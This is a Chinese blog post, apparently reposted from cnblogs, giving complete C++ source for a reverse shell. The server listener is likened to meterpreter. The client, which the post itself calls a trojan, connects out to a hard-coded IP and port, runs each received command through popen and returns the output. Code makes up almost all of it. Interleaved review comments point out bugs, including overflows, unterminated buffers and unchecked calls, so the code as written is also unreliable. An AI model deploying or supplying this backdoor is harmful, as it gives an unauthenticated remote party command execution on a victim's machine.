• Socket实现交互式shell代码


    Socket实现交互式shell

    使用socket系列函数实现,原理很简单:服务端在3456端口监听,把从标准输入读到的命令发给客户端;客户端用popen执行命令后把输出回传.整个通信是明文TCP,双方都不做任何身份校验.
    

    服务端代码: (相当于meterpreter)

    #include <iostream>
    #include <cstdio>
    #include <cstring>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <unistd.h>
    #include <ctype.h>
    #include <arpa/inet.h>
    #include <cstdlib>
    #define SERVER_PORT 3456
    using namespace std;
    
    // Operator-side listener. Accepts a single TCP client on SERVER_PORT, then
    // alternates between printing whatever the client sent and forwarding one
    // line read from stdin back to it. The stream is plaintext and the peer is
    // never authenticated, so anything on the path can read or alter it.
    // Review notes: no return value of socket/bind/listen/accept/write is
    // checked, and the listening descriptor `sock` is never closed.
    void shell() {
            int sock;
            struct sockaddr_in server_addr;
            sock = socket(AF_INET, SOCK_STREAM, 0);
    
            bzero(&server_addr, sizeof(server_addr));
            server_addr.sin_family = AF_INET;
            // INADDR_ANY: the listener is reachable on every local interface.
            server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
            server_addr.sin_port = htons(SERVER_PORT);
    
            bind(sock, (struct sockaddr *)&server_addr, sizeof(server_addr));
    
    
            cout << "Waiting client..." << endl;
            listen(sock, 128);
            // 4 KiB buffer shared by the receive and the stdin path; the malloc
            // result is not checked and the buffer is never freed.
            char *buf =(char *)malloc(0x1000);
            int text_len = 0;
    
            struct sockaddr_in client;
            int client_sock;
            // Declared but never filled in or printed anywhere in this function.
            char client_ip[64];
            socklen_t client_addr_len = sizeof(client);
    
            client_sock = accept(sock, (struct sockaddr *)&client, &client_addr_len);
            // Only the peer port is logged; the "Client ip: " label is followed by
            // no address, so the log line does not identify the remote host.
            cout << "Successful connection!"
            << endl
            << "Client ip: "
            << "    port: "
            << ntohs(client.sin_port)
            << endl;
    
            while(true) {
                    // Reads at most 0xFFF bytes, leaving room for a terminator.
                    // When read() returns 0 (peer closed) or -1 (error) nothing
                    // below runs and nothing breaks the loop, so it spins.
                    text_len = read(client_sock, buf, 0x1000 - 1);
                    if(text_len > 0){
                            // NOTE(review): 'x00' is a multi-character constant, not
                            // NUL -- presumably '\x00' with the backslash lost. As
                            // written the received data is not reliably terminated
                            // before being streamed to cout.
                            buf[text_len] = 'x00';
                            cout << buf;
    
                            // fgets result is unchecked; on EOF buf keeps the
                            // bytes just received from the peer.
                            fgets(buf, 0x200, stdin);
                            // fgets keeps the newline of a line ended with Enter,
                            // so such a line holds "exit\n" and does not compare
                            // equal to "exit" here.
                            if(!strcmp(buf, "exit")) {
                                    cout << "Closed connection" << endl;
                                    // 0x5 = the four characters plus the NUL.
                                    write(client_sock, "exit", 0x5);
                                    break;
                            }
                            // Sends the typed line including its terminating NUL.
                            write(client_sock, buf, strlen(buf) + 1);
                    }
            }
            close(client_sock);
    
    }
    
    // Entry point: put stdin and stdout into unbuffered mode, then run shell().
    int main() {
            FILE *const unbuffered[] = {stdin, stdout};
            for (FILE *stream : unbuffered) {
                    setbuf(stream, nullptr);
            }
            shell();
            return 0;
    }
    
    

    客户端代码: (相当于木马)

    #include <cstdlib>
    #include <iostream>
    #include <cstdio>
    #include <cstring>
    #include <unistd.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #define SERVER_PORT 3456
    #define SERVER_IP "192.168.100.3"
    using namespace std;
    // Runs `cmd` through popen() and appends output to `result`.
    //   cmd    - NUL-terminated command string; in this file it is the raw
    //            buffer received from the network peer.
    //   result - caller-owned buffer that is appended to with strcat; this
    //            function neither clears it nor knows its capacity.
    // popen() hands the string to the system shell, so each received command
    // shows up as a shell child process of this program. Only the command's
    // standard output is read ("r" mode).
    void exeCmd(const char *cmd, char *result)
    {
            char buf_ps[1024];
            char ps[1024]={0};
            FILE *ptr;
            // Unbounded copy into a 1024-byte stack buffer: the caller can pass
            // up to 0xFFF bytes, so a long command overflows `ps`.
            strcpy(ps, cmd);
            if((ptr=popen(ps, "r"))!=NULL)
            {
                    while(fgets(buf_ps, 1024, ptr)!=NULL)
                    {
                    // No bounds check against the size of `result`.
                    strcat(result, buf_ps);
    
                    // The length guard below is commented out, which leaves the
                    // `break` unconditional: at most one fgets chunk is appended.
    //              if(strlen(result) > 4000)
                    break;
            }
            pclose(ptr);
            ptr = NULL;
    
            }
            else
            {
                    cout << "popen error: " << ps << endl;
            }
    }
    // Client side: opens a TCP connection to SERVER_IP:SERVER_PORT, then loops
    // reading a buffer from the socket, passing it to exeCmd() and writing the
    // accumulated output back. Whatever arrives on the socket is executed; the
    // sender is not authenticated and the stream is plaintext.
    // Observable behaviour: an outbound TCP connection to the hard-coded
    // address and port, "connecting"/"connected!" on stdout, and one shell
    // child process per received command (via popen in exeCmd).
    void shell(){
            int sockfd = 0;
            struct sockaddr_in serveraddr;
            // Both mallocs are unchecked, the memory is uninitialised, and
            // neither buffer is freed.
            char *buf_r = (char *)malloc(0x1000);
            char *buf_w = (char *)malloc(0x1000);
            int text_len = 0;
    
            sockfd = socket(AF_INET, SOCK_STREAM, 0);
            bzero(&serveraddr, sizeof(struct sockaddr_in));
            serveraddr.sin_family = AF_INET;
    
            // inet_pton's return value is ignored.
            inet_pton(AF_INET, SERVER_IP, &serveraddr.sin_addr);
            serveraddr.sin_port = htons(SERVER_PORT);
    
            while(true){
                    cout << "connecting";
                    // connect()'s result is discarded; the test below looks at
                    // the descriptor returned by socket(), not at whether the
                    // connection was established.
                    connect(sockfd, (struct sockaddr *)&serveraddr, sizeof(serveraddr));
                    if(sockfd > 0) {
                    cout << "connected!";
                    // 0x10 = 16 bytes requested from an 11-byte string literal:
                    // the write reads past the end of the literal.
                    write(sockfd, "connected!", 0x10);
                            break;
                    }
            }
            while(true) {
                    text_len = read(sockfd, buf_r, 0x1000 - 1);
                    // Indexed before text_len is validated: a -1 from read()
                    // writes to buf_r[-1].
                    // NOTE(review): 'x00' is a multi-character constant, not NUL
                    // -- presumably '\x00' with the backslash lost.
                    buf_r[text_len] = 'x00';
                    if(text_len > 0) {
                            // buf_w is never cleared, so exeCmd's strcat starts on
                            // uninitialised memory and keeps appending across
                            // iterations with no bound.
                            exeCmd(buf_r, buf_w);
                            text_len = strlen(buf_w);
                            // Checked only after exeCmd has already been called
                            // with the same buffer.
                            if(!strcmp(buf_r, "exit")) {
                                    break;
                            }
                            write(sockfd, buf_w, text_len + 1);
    
                    }
            }
            close(sockfd);
    }
    // Entry point: disable buffering on stdin and stdout, then run shell().
    int main() {
            FILE *const unbuffered[] = {stdin, stdout};
            for (FILE *stream : unbuffered) {
                    setbuf(stream, nullptr);
            }
            shell();
            return 0;
    }
    
  • 原文地址:https://www.cnblogs.com/lyxf/p/12230440.html